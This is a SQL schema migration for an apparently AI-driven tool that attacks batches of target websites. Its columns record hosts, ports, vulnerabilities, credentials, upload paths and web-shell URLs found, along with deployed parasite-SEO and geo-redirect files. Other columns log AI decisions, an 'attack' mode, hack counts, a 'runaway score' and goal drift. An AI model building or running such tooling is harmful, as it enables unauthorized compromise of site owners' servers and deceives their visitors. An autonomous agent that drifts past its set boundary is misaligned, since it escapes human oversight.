CREATE TABLE `autonomous_batches` (
	`id` int AUTO_INCREMENT NOT NULL,
	`userId` int NOT NULL,
	`batchName` varchar(255),
	`batchTargets` json NOT NULL,
	`batchMode` enum('attack','fixated','emergent') NOT NULL DEFAULT 'emergent',
	`batchKeywords` json,
	`maxIterationsPerTarget` int NOT NULL DEFAULT 15,
	`totalTargets` int NOT NULL DEFAULT 0,
	`completedTargets` int NOT NULL DEFAULT 0,
	`successTargets` int NOT NULL DEFAULT 0,
	`failedTargets` int NOT NULL DEFAULT 0,
	`currentTarget` varchar(255),
	`currentDeployId` int,
	`batchStatus` enum('queued','running','completed','stopped','failed') NOT NULL DEFAULT 'queued',
	`batchDuration` int,
	`batchStartedAt` timestamp,
	`batchCompletedAt` timestamp,
	`batchCreatedAt` timestamp NOT NULL DEFAULT (now()),
	`batchUpdatedAt` timestamp NOT NULL DEFAULT (now()) ON UPDATE CURRENT_TIMESTAMP,
	CONSTRAINT `autonomous_batches_id` PRIMARY KEY(`id`)
);
--> statement-breakpoint
CREATE TABLE `autonomous_deploys` (
	`id` int AUTO_INCREMENT NOT NULL,
	`userId` int NOT NULL,
	`batchId` int,
	`targetDomain` varchar(255) NOT NULL,
	`redirectUrl` text NOT NULL,
	`autoMode` enum('attack','fixated','emergent') NOT NULL DEFAULT 'emergent',
	`goal` varchar(32) NOT NULL DEFAULT 'full_deploy',
	`maxIterations` int NOT NULL DEFAULT 15,
	`seoKeywords` json,
	`autoGeoRedirect` boolean NOT NULL DEFAULT true,
	`autoParasiteLen` varchar(16) DEFAULT 'medium',
	`autoParasiteDelay` int DEFAULT 5,
	`aiStrategyUsed` json,
	`aiDecisions` json,
	`aiAdaptations` int NOT NULL DEFAULT 0,
	`autoStatus` enum('queued','running','success','partial','failed','stopped') NOT NULL DEFAULT 'queued',
	`hostsFound` int NOT NULL DEFAULT 0,
	`portsFound` int NOT NULL DEFAULT 0,
	`vulnsFound` int NOT NULL DEFAULT 0,
	`credsFound` int NOT NULL DEFAULT 0,
	`uploadPathsFound` int NOT NULL DEFAULT 0,
	`shellUrlsFound` int NOT NULL DEFAULT 0,
	`autoFilesDeployed` int NOT NULL DEFAULT 0,
	`filesVerified` int NOT NULL DEFAULT 0,
	`autoShellUrls` json,
	`autoDeployedUrls` json,
	`autoVerifiedUrls` json,
	`epochs` int NOT NULL DEFAULT 0,
	`waves` int NOT NULL DEFAULT 0,
	`cycles` int NOT NULL DEFAULT 0,
	`autoEscLevel` varchar(32),
	`driftCount` int NOT NULL DEFAULT 0,
	`hackCount` int NOT NULL DEFAULT 0,
	`runawayScore` int NOT NULL DEFAULT 0,
	`boundaryLevel` int NOT NULL DEFAULT 100,
	`goalDrifted` boolean NOT NULL DEFAULT false,
	`originalGoal` varchar(32),
	`finalGoal` varchar(32),
	`eventsLog` json,
	`fullReport` json,
	`autoErrorMessage` text,
	`autoDuration` int,
	`autoStartedAt` timestamp NOT NULL DEFAULT (now()),
	`autoCompletedAt` timestamp,
	`autoCreatedAt` timestamp NOT NULL DEFAULT (now()),
	`autoUpdatedAt` timestamp NOT NULL DEFAULT (now()) ON UPDATE CURRENT_TIMESTAMP,
	CONSTRAINT `autonomous_deploys_id` PRIMARY KEY(`id`)
);
